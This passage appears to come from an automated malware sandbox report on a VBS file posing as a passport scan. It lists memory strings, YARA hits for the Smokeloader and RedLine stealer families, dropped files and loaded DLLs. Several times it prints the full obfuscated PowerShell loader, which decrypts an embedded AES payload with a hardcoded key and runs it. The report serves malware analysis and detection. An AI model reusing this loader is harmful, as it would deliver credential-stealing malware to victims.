                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 4.3.putty.exe.610000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.daersgt.5c0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.daersgt.5d0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.600e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.daersgt.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1422409130.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1730917327.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1493739867.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1679840945.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: 00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.1493586854.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.1730917327.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.1493739867.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.1730604658.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000007.00000002.1730528749.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2868, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)Jump to behavior
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00402F8F RtlCreateUserThread,NtTerminateProcess,4_2_00402F8F
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004013BF
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00401412 NtAllocateVirtualMemory,4_2_00401412
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013CA NtAllocateVirtualMemory,4_2_004013CA
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014D3
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013D9 NtAllocateVirtualMemory,4_2_004013D9
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013E0 NtAllocateVirtualMemory,4_2_004013E0
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013F0 NtAllocateVirtualMemory,4_2_004013F0
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004013F4 NtAllocateVirtualMemory,4_2_004013F4
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014F7
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014B5
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_00402F8F RtlCreateUserThread,NtTerminateProcess,7_2_00402F8F
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004013BF
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_00401412 NtAllocateVirtualMemory,7_2_00401412
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004013CA NtAllocateVirtualMemory,7_2_004013CA
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014D3
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004013D9 NtAllocateVirtualMemory,7_2_004013D9
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004013E0 NtAllocateVirtualMemory,7_2_004013E0
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004013F0 NtAllocateVirtualMemory,7_2_004013F0
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004013F4 NtAllocateVirtualMemory,7_2_004013F4
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014F7
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014B5
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0040D2414_2_0040D241
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0041180C4_2_0041180C
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004132114_2_00413211
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004112C84_2_004112C8
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00411D504_2_00411D50
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_0040D2417_2_0040D241
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_0041180C7_2_0041180C
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004132117_2_00413211
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004112C87_2_004112C8
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_00411D507_2_00411D50
                Source: 00000004.00000002.1493799106.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.1730637355.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.1493586854.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.1730917327.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.1493739867.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.1730604658.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000007.00000002.1730528749.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: Process Memory Space: powershell.exe PID: 2868, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: putty.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: daersgt.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@7/5@5/2
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00541CC0 CreateToolhelp32Snapshot,Module32First,4_2_00541CC0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctiqzrue.m2h.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsReversingLabs: Detection: 21%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\daersgt C:\Users\user\AppData\Roaming\daersgt
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
